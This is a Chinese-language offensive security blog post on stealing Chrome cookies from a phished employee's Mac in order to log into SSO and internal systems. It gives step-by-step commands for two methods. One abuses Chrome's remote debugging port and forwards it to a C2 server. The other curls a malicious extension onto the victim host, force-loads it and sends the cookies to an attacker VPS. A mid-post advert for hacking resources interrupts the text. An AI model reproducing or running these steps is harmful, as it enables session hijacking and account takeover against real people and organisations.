mac 浏览器密码获取难？教你两种方法，轻松搞定

前言

Windows 系统密码和 cookie 获取比较容易，用工具即可，但 Mac 下浏览器密码获取较难。

背景

当我们通过钓鱼等方式拿到单位员工的个人 PC 机时，通常需要对主机进行信息收集。而浏览器是一个重要的信息收集点。我们可以收集历史记录、书签寻找靶机。窃取密码登录 SSO、内部 OA 等等关键系统。但是在 MAC 下，因为系统的安全性，想要获取密码存在比较大的困难。

在 macOS 上，Google Chrome 的加密密钥存储在 Keychain 中，需要使用用户的明文密码解锁。

在 Windows 上，Google Chrome 版本 80+ 使用使用 DPAPI 加密的 AES-256 密钥加密 cookie。解密时不需密码。

windows 下密码和 cookie 获取比较容易，一般上工具（HackBrowserData）就行，这里不多说。mac 下的浏览器密码不好获取。mac 下因为系统安全性受限，使用相关工具会弹输入用户密码的框。看下面的弹窗提示，一下就暴露了，一般人也不会点允许。

因此我们得曲线救国，比如说获取 cookie。这里提供两种方法：

思路一：无头浏览器远程调试

为了便于调试和自动化，chrome 内核的浏览器支持远程调试，然后可以直接调用调试接口获取 cookie。网上的资料几乎大都是使用--headless 无头模式利用，但本人在 mac pro、最新版 chrome 浏览器却无法复现。

使用 headless 无头浏览器模式会爆如下的错误：

在一个老外的文章里找到了原因：

然后 curl 接口，不并无相关数据显示

第一步

1. ps aux|grep Chrome 观察浏览器是否在运行。

2. 若浏览器在运行，执行：killall "Google Chrome" 杀掉浏览器进程

3. 马上在第二步命令后加上--restore-last-session，还原浏览器最近浏览的选项卡。

4. 若浏览器未在运行，直接执行第二步，获取到 cookie 后 杀掉进程即可

第二步

启动 chrome 内核浏览器，开启指定调试端口

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/用户名/Library/Application Support/Google/Chrome"

第三步

查看调试端口

curl -s localhost:9222/json

第四步

使用相关 websocket 工具（这里为了方便演示，直接使用了插件 Simple WebSocket Client****，入侵时候把调试端口用代理转发到本地，localhost 改成 c2 ip 就好。若不想代理，命令行下 websocket 的相关工具还有 wsc、python 模块等），

从第三步获取的结果中，任选一个 webSocketDebuggerUrl，发送{"id": 1, "method": "Network.getAllCookies"}

成功获取所有 cookie

【一>所有资源获取<一】1、很多已经买不到的绝版电子书 2、安全大厂内部的培训资料 3、全套工具包 4、100 份 src 源码技术文档 5、网络安全基础入门、Linux、web 安全、攻防方面的视频 6、应急响应笔记 7、 网络安全学习路线 8、ctf 夺旗赛解析 9、WEB 安全入门笔记

思路二：命令行加载恶意拓展

第二个思路来源是网上看到新闻，存在 chrome 恶意插件盗取用户的 cookie，因此查找相关资料进行学习。

令人惊喜的是，有位师傅 github 有直接写好获取 cookie 的插件

https://github.com/saucer-man/chrome_get_cookie

因此这里我们直接调用上面的插件脚本进行利用

第一步

vps 起一个 flask 服务器监听，接受 cookies 数据

第二步

使用 curl 或者 wget 下载恶意 chrome 插件文件夹到肉鸡电脑，

curl http://X.X.X.X/cookie.zip -o /tmp/cookie.zip unzip cookie.zip

第三步

用户未打开浏览器的情况，或我们直接杀掉浏览器进程：

killall "Google Chrome"

然后执行命令，使 chromer 浏览器加载我们的拓展

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --load-extension=/tmp/cookie --user-data-dir="/Users/用户名/Library/Application Support/Google/Chrome" --restore-last-session

加载后会打开 chromer 浏览器

vps 服务器也同步接收到了数据，保存 cookie.json 文件在当前目录

用户已打开浏览器的时候，因为两个正在运行的 Chrome 实例不能共享同一个用户数据目录，因此用上面方法就行不通了。

网上有方法是把用户数据复制到另一个目录，但复现未成功，打开的是没用户数据的 chrome 浏览器。

首先使用 cp 命令复制文件夹到 tmp 目录

cp -R ~/Library/Application\ Support/Google/Chrome/Default ~/tmp

使用--user-data 命令，指定用户数据执行命令

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --user-data-dir=~/tmp --load-extension=/Users/用户名/Desktop/tools/redteam/chrome_get_cookie

弹出来的是空白浏览器：

接收不到 cookie

参考链接：

[tps://saucer-man.com/information_security/787.html](https://saucer-man.com/information_security/787.html)
[https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e)
[https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/](https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/)（firefox）

注意

killall "Google Chrome" 关闭 chrome 浏览器进程的命令

浏览器命令行相关参数：

chrome 用户数据配置文件夹保存路径：

Mac OS X: ~/Library/Application Support/Google/Chrome/Default
Windows XP: Documents and SettingsusernameLocal SettingsApplication DataGoogleChromeUser DataDefault
Windows 7: C:\Users\xxx\AppData\Local\Google\Chrome\User Data\Default
Linux: ~/.config/google-chrome/Default
Ubuntu: ~/.config/google-chrome 或 ~/.config/chromium